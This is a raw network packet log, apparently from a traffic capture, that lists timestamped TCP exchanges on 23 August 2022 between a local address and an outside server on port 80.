                                                                                                                                                                      Aug 23, 2022 18:27:52.407186031 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407197952 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407215118 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407232046 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407247066 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407258987 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407275915 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407286882 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407310009 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407327890 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407340050 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407392979 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407419920 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407421112 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407443047 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407465935 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407494068 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407496929 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407527924 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407541990 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407553911 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407581091 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407593012 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407627106 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407638073 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407660007 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407665968 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407691956 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407695055 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407716036 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407727957 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407757998 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407778025 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407792091 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407814026 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407825947 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407854080 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407857895 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407872915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407891989 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407907963 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407926083 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407944918 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407958031 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.407978058 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.407994032 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408005953 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408027887 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408039093 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408061028 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408075094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408092022 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408111095 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408124924 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408134937 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408189058 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408221960 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408221960 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408230066 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408257008 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408261061 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408293009 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408305883 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408324957 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408354998 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408358097 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408384085 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408389091 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408421993 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408438921 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408452988 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408485889 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408487082 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408503056 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408519983 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408535957 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408549070 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408560991 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408571959 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408586979 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408598900 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408611059 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408623934 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408638954 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408648968 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408673048 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408694029 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408696890 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408699036 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408723116 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408729076 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408746004 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408746958 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408772945 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408776999 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408793926 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408797026 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408813000 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408821106 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408830881 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408848047 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408868074 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408874035 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408891916 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408900023 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408912897 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408927917 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408936024 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408953905 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408962965 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.408982992 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.408993006 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409008980 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409017086 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409033060 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409060001 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409080982 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409085035 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409111977 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409112930 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409123898 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409140110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409153938 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409164906 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409172058 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409190893 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409199953 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409215927 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409229040 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409240961 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409251928 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409266949 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409274101 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409291983 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409303904 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409317970 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409324884 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409346104 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409352064 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409370899 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409382105 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409396887 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409404039 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409423113 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409430981 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409450054 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409461021 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409475088 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409482956 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409499884 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409507990 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409526110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409537077 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409547091 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409564972 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409573078 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409579992 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409598112 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409610033 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409621954 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409632921 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409647942 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409658909 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409672022 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409683943 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409696102 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409706116 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409720898 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409729004 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409746885 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409756899 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409770012 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409785032 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409794092 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409806013 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409818888 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409827948 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409845114 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409856081 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409868956 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409877062 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409892082 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409902096 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409921885 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409945965 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409955025 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409970999 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.409972906 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409995079 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.409997940 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410008907 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410023928 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410033941 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410048962 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410069942 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410073042 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410095930 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410098076 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410113096 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410123110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410129070 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410146952 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410162926 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410170078 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410176039 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410197020 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410211086 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410221100 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410237074 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410244942 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410254002 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410269976 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410274982 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410295010 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410315037 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410320997 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410336018 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410346031 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410353899 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410372972 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410392046 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410398006 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410413027 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410423994 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.410427094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.410463095 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.413364887 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.413436890 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414681911 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414711952 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414737940 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414764881 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414764881 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414787054 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414789915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414793968 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414807081 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414810896 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414824963 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414834023 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414839983 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414869070 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.414916039 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.414954901 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.415030003 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.415060043 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.415067911 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.415088892 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.415100098 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.415117979 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.415127039 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.415149927 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.415153027 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.415183067 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.415764093 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.415837049 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.416903019 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.416944027 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.416975021 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.416980028 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.417006969 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.417032957 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.417042971 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.417071104 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.417107105 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.418920040 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.418955088 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.418983936 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.418994904 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419013023 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419022083 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419037104 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419043064 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419061899 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419070959 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419081926 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419101000 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419111013 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419142962 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419424057 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419452906 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419472933 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419480085 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419487000 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419509888 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419517994 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419537067 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419543028 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419568062 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419574976 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419596910 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419610023 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.419625998 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.419632912 CEST4994780192.168.2.688.198.122.116
